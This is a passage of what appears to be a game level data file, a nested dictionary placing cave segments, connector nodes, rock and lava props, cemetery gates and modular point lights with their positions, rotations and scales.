1.0)},'1235611209.75akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611117.69akelts','Pos': Point3(-175.0, -175.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(525.0, 75.0, 241.991),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1236293632.0akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_curveNarrow'}},'1235611119.02akelts': {'Type': 'Cave_Pieces','Hpr': Point3(0.0, 0.0, 0.0),'Objects': {'1235611119.03akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': 
VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611119.02akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611298.88akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611119.02akelts','Pos': Point3(75.0, -75.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611298.89akelts': {'Type': 'Locator Node','Name': 'cave_connector_2','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611119.02akelts','Pos': Point3(-75.0, -75.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237582208.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-91.2, 0.0, 0.0),'Pos': Point3(11.389, -96.256, -0.225),'Scale': VBase3(2.425, 2.425, 2.425),'VisSize': 'Large','VisZone': '2_1235611119.02akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_pool_lavaC'}}},'Pos': Point3(0.0, -200.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '2_1235611035.98akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_threeway150'}},'1235611119.33akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(180.0, 0.0, 0.0),'Objects': {'1235611119.34akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611119.33akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611307.05akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611119.33akelts','Pos': Point3(75.0, -75.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611307.06akelts': {'Type': 'Locator Node','Name': 'cave_connector_2','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611119.33akelts','Pos': Point3(-75.0, -75.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237590912.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(67.269, 0.0, 0.0),'Pos': Point3(65.645, -42.025, -3.029),'Scale': VBase3(1.393, 1.393, 1.393),'VisSize': 'Large','VisZone': '3_1235611119.33akelts','Visual': {'Model': 
'models/props/pir_m_prp_cav_rock_d'}},'1238123189.34kmuller': {'Type': 'Light - Modular','ConeAngle': '81.4157','ConstantAttenuation': '0.5904','DropOff': '0.0000','Hpr': VBase3(-180.0, -17.526, 0.0),'LightSphere': True,'LightType': 'POINT','LinearAttenuation': '0.0000','Pos': Point3(1.547, -101.042, 18.277),'QuadraticAttenuation': '0.2771','Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','VisZone': '2_1235611119.33akelts','Visual': {'Color': (0.9, 0.48, 0.13, 1.0),'Model': 'models/props/light_tool_bulb_modular'}},'1238128143.19kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(107.931, 0.0, 0.0),'Pos': Point3(24.201, -18.423, 0.065),'Scale': VBase3(0.69, 0.69, 0.76),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}}},'Pos': Point3(0.0, 0.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_threeway150_lava'}},'1235611119.91akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(90.0, 0.0, 0.0),'Objects': {'1235611119.92akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611119.91akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611316.72akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611119.91akelts','Pos': Point3(0.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237584512.0akelts': {'Type': 'Cemetary','DisableCollision': False,'Holiday': '','Hpr': VBase3(178.728, 0.0, 0.0),'Pos': Point3(-0.482, -62.944, 0.0),'Scale': VBase3(1.313, 1.313, 1.313),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cem_gate_english'}},'1237588864.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(34.692, 0.0, 0.0),'Pos': Point3(15.447, -72.374, -2.221),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','Visual': {'Model': 
'models/props/pir_m_prp_cav_rock_c'}},'1237588864.0akelts0': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-128.809, 0.0, 0.0),'Pos': Point3(-23.326, -68.662, 1.046),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1238123329.65kmuller': {'Type': 'Light - Modular','ConeAngle': '60.0000','ConstantAttenuation': '0.9639','DropOff': '0.0000','Hpr': VBase3(0.0, 0.0, 0.0),'LightSphere': False,'LightType': 'POINT','LinearAttenuation': '0.0127','Pos': Point3(-1.943, -52.335, 8.712),'QuadraticAttenuation': '0.1747','Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','VisZone': '1_1235611119.91akelts','Visual': {'Color': (0.94, 0.52, 0.12, 1.0),'Model': 'models/props/light_tool_bulb_modular'}}},'Pos': Point3(75.0, 75.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallTransition'}},'1235611120.45akelts': {'Type': 'Cave_Pieces','Hpr': Point3(0.0, 0.0, 0.0),'Objects': {'1235611120.47akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611120.45akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611328.42akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611120.45akelts','Pos': Point3(-175.0, -175.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237827147.39akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(42.821, 0.017, 169.654),'Pos': Point3(-24.334, -20.783, 29.172),'Scale': VBase3(5.545, 5.545, 5.545),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_h'}},'1238123885.11kmuller': {'Type': 'Light - Modular','ConeAngle': '60.0000','ConstantAttenuation': '0.9639','DropOff': '0.0000','Hpr': VBase3(0.0, 0.0, 0.0),'LightSphere': False,'LightType': 'POINT','LinearAttenuation': 
'0.0343','Pos': Point3(-67.237, -148.457, 8.818),'QuadraticAttenuation': '0.1928','Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','VisZone': '1_1235611120.45akelts','Visual': {'Color': (1.0, 0.71, 0.12, 1.0),'Model': 'models/props/light_tool_bulb_modular'}}},'Pos': Point3(350.0, 250.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611120.45akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_curveNarrow'}},'1235611121.0akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(270.0, 0.0, 0.0),'Objects': {'1235611121.02akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611121.0akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611141.33akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611121.0akelts','Pos': Point3(0.0, -150.0, -42.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237588608.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-90.0, 14.546, -157.689),'Pos': Point3(5.371, -120.77, 4.706),'Scale': VBase3(1.675, 1.675, 0.952),'VisSize': 'Large','VisZone': '0_1235611121.0akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_c'}}},'Pos': Point3(-200.0, -100.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '1_1235611121.0akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallNarrowDescend'}},'1235611344.81akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(360.0, 0.0, 0.0),'Objects': {'1235611344.83akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611344.81akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611344.89akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611344.81akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(250.0, 450.0, 200.0),'Scale': VBase3(1.0, 1.0, 
1.0),'VisSize': 'Large','VisZone': '0_1235611344.81akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_elbow100'}},'1235611347.08akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(270.0, 0.0, 0.0),'Objects': {'1235611347.09akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611347.08akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611347.16akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611347.08akelts','Pos': Point3(0.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(300.0, 300.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611361.5akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallNarrow100'}},'1235611348.2akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(-90.0, 0.0, 0.0),'Objects': {'1235611348.22akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611348.2akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611348.28akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611348.2akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(200.0, 300.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '1_1235611347.08akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_elbow100'}},'1235611348.83akelts': {'Type': 'Cave_Pieces','Hpr': Point3(0.0, 0.0, 0.0),'Objects': {'1235611348.84akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611348.83akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(150.0, 250.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611348.83akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_deadend100'}},'1235611352.23akelts': {'Type': 'Cave_Pieces','Hpr': 
VBase3(270.0, 0.0, 0.0),'Objects': {'1235611352.3akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611352.23akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(200.0, 500.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611352.23akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_deadend100'}},'1235611352.94akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(450.0, 0.0, 0.0),'Objects': {'1235611352.95akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611352.94akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611352.97akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611352.94akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611353.02akelts': {'Type': 'Locator Node','Name': 'cave_connector_2','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611352.94akelts','Pos': Point3(-50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237827053.79akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-128.553, 0.0, 16.323),'Pos': Point3(49.82, -25.985, -1.642),'Scale': VBase3(1.248, 1.248, 1.248),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_c'}},'1237827221.59akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-49.526, 12.195, -169.214),'Pos': Point3(-44.773, -39.047, 36.683),'Scale': VBase3(5.545, 5.545, 5.545),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_i'}},'1237827472.21akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(141.447, 0.0, -21.643),'Pos': Point3(-29.03, -9.062, -4.06),'Scale': VBase3(1.248, 1.248, 1.749),'VisSize': 'Large','VisZone': 
'0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_b'}}},'Pos': Point3(300.0, 400.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '2_1235611344.81akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_threeway100'}},'1235611353.63akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(180.0, 0.0, 0.0),'Objects': {'1235611353.64akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611353.63akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235686400.0akelts1': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611353.63akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237827511.65akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-38.536, 0.042, -21.643),'Pos': Point3(15.899, -28.795, -5.35),'Scale': VBase3(1.659, 1.373, 1.189),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_d'}},'1237827546.46akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(141.447, 0.0, -21.643),'Pos': Point3(-2.405, -79.498, -8.856),'Scale': VBase3(1.508, 1.248, 1.081),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_d'}}},'Pos': Point3(250.0, 450.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611344.81akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_elbow100'}},'1235611361.5akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(450.0, 0.0, 0.0),'Objects': {'1235611361.55akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611361.5akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611361.56akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611361.5akelts','Pos': 
Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611361.58akelts': {'Type': 'Locator Node','Name': 'cave_connector_2','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611361.5akelts','Pos': Point3(-50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237827026.68akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.993, 0.0, 0.0),'Pos': Point3(46.862, -60.316, -0.02),'Scale': VBase3(0.593, 0.593, 0.593),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1237827576.62akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(51.447, 0.0, -21.643),'Pos': Point3(-14.326, -20.546, -10.031),'Scale': VBase3(1.508, 1.248, 1.081),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_d'}},'1238124363.02kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-90.0, 0.0, 0.0),'Pos': Point3(17.253, -40.298, 18.138),'Scale': VBase3(0.415, 0.415, 0.415),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_stite_med'}},'1238124424.97kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-90.0, 0.0, 0.0),'Pos': Point3(18.839, -64.68, -0.475),'Scale': VBase3(0.862, 0.862, 0.862),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_smites_single_grooves'}},'1238124454.94kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-90.0, 0.0, 0.0),'Pos': Point3(18.85, -32.635, 17.474),'Scale': VBase3(0.27, 0.27, 0.27),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_stite_single'}},'1238124512.89kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-133.832, 0.0, 0.0),'Pos': Point3(-2.489, -22.842, -0.262),'Scale': VBase3(0.377, 0.377, 0.377),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_column_large'}},'1238124542.84kmuller': 
{'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-180.0, -2.343, -2.966),'Pos': Point3(36.597, -54.375, 14.045),'Scale': VBase3(0.415, 0.415, 0.415),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_stite_med'}},'1238124581.13kmuller': {'Type': 'Light - Modular','ConeAngle': '60.0000','ConstantAttenuation': '0.9639','DropOff': '0.0000','Hpr': VBase3(11.112, 0.0, 0.0),'LightSphere': False,'LightType': 'POINT','LinearAttenuation': '0.0127','Pos': Point3(-5.516, -33.224, 7.652),'QuadraticAttenuation': '0.1747','Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','VisZone': '2_1235611361.5akelts','Visual': {'Color': (1.0, 0.71, 0.12, 1.0),'Model': 'models/props/light_tool_bulb_modular'}},'1238124674.48kmuller': {'Type': 'Light_Fixtures','DisableCollision': False,'Holiday': '','Hpr': VBase3(31.843, 0.0, 0.0),'Pos': Point3(-5.396, -27.554, -0.245),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/torch'}}},'Pos': Point3(300.0, 300.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611361.5akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_threeway100'}},'1235611519.63akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(-90.0, 0.0, 0.0),'Objects': {'1235611519.69akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611519.63akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611549.09akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611519.63akelts','Pos': Point3(0.0, -150.0, 42.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237591040.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(18.807, -5.357, 0.0),'Pos': Point3(-34.755, -129.84, 16.22),'Scale': VBase3(1.393, 1.393, 1.393),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}},'1238122175.84kmuller': {'Type': 'Light - Modular','ConeAngle': 
'60.0000','ConstantAttenuation': '0.9639','DropOff': '0.0000','Hpr': VBase3(90.0, 0.0, 0.0),'LightSphere': False,'LightType': 'POINT','LinearAttenuation': '0.0127','Pos': Point3(23.37, -90.963, 38.952),'QuadraticAttenuation': '0.1747','Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.94, 0.63, 0.12, 1.0),'Model': 'models/props/light_tool_bulb_modular'}},'1238123123.41kmuller': {'Type': 'Light - Modular','ConeAngle': '60.0000','ConstantAttenuation': '0.9639','DropOff': '0.0000','Hpr': VBase3(90.0, 0.0, 0.0),'LightSphere': False,'LightType': 'POINT','LinearAttenuation': '0.0127','Pos': Point3(-23.434, -8.576, 15.223),'QuadraticAttenuation': '0.1747','Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','VisZone': '0_1235611519.63akelts','Visual': {'Color': (0.94, 0.52, 0.12, 1.0),'Model': 'models/props/light_tool_bulb_modular'}}},'Pos': Point3(-75.0, 75.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611519.63akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallWideAscend'}},'1235611528.14akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(450.0, 0.0, 0.0),'Objects': {'1235611528.16akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611528.14akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611602.09akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611528.14akelts','Pos': Point3(-175.0, -175.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(175.0, 725.001, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611528.14akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_curveNarrow'}},'1235611528.78akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(90.0, 0.0, 0.0),'Objects': {'1235611528.8akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611528.78akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 
1.0, 1.0)},'1235611616.73akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611528.78akelts','Pos': Point3(0.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237584384.0akelts0': {'Type': 'Cemetary','DisableCollision': False,'Holiday': '','Hpr': VBase3(-178.434, 0.0, 0.0),'Pos': Point3(-0.38, -77.135, 0.0),'Scale': VBase3(1.313, 1.313, 1.313),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cem_gate_english'}},'1237595008.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-118.503, 0.0, 0.0),'Pos': Point3(-11.756, -77.379, -6.813),'Scale': VBase3(1.463, 1.463, 1.463),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_c'}},'1237595136.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(102.858, 4.169, 0.0),'Pos': Point3(19.491, -73.43, -2.133),'Scale': VBase3(1.076, 1.076, 1.076),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_tall'}}},'Pos': Point3(75.0, 725.001, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611528.78akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallTransition'}},'1235611529.42akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(270.0, 0.0, 0.0),'Objects': {'1235611529.44akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611529.42akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611626.7akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611529.42akelts','Pos': Point3(100.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237584384.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(119.654, 0.0, 0.0),'Pos': Point3(50.552, -62.319, -0.678),'Scale': VBase3(2.38, 2.38, 2.38),'VisSize': 'Large','VisZone': '2_1235611529.42akelts','Visual': {'Model': 
'models/props/pir_m_prp_cav_pool_lavaB'}}},'Pos': Point3(75.0, 725.001, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611528.78akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_elbow200'}},'1235611530.08akelts': {'Type': 'Cave_Pieces','Hpr': Point3(0.0, 0.0, 0.0),'Objects': {'1235611530.09akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611530.08akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611650.22akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611530.08akelts','Pos': Point3(100.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1238121988.24kmuller': {'Type': 'Light - Modular','ConeAngle': '15.0000','ConstantAttenuation': '0.0843','DropOff': '0.0000','Hpr': Point3(0.0, 0.0, 0.0),'LightSphere': False,'LightType': 'POINT','LinearAttenuation': '0.0199','Pos': Point3(-4.061, -96.926, 41.306),'QuadraticAttenuation': '0.0000','Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.83, 0.38, 0.0, 1.0),'Model': 'models/props/light_tool_bulb_modular'}},'1238123063.16kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-165.326, 0.0, 0.0),'Pos': Point3(78.695, -56.225, 0.915),'Scale': VBase3(1.225, 1.225, 1.225),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_lavafall'}}},'Pos': Point3(-325.0, 175.0, 242.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611530.08akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_elbow200_lava'}},'1235611530.73akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(630.0, 0.0, 0.0),'Objects': {'1235611530.75akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611530.73akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611680.64akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 
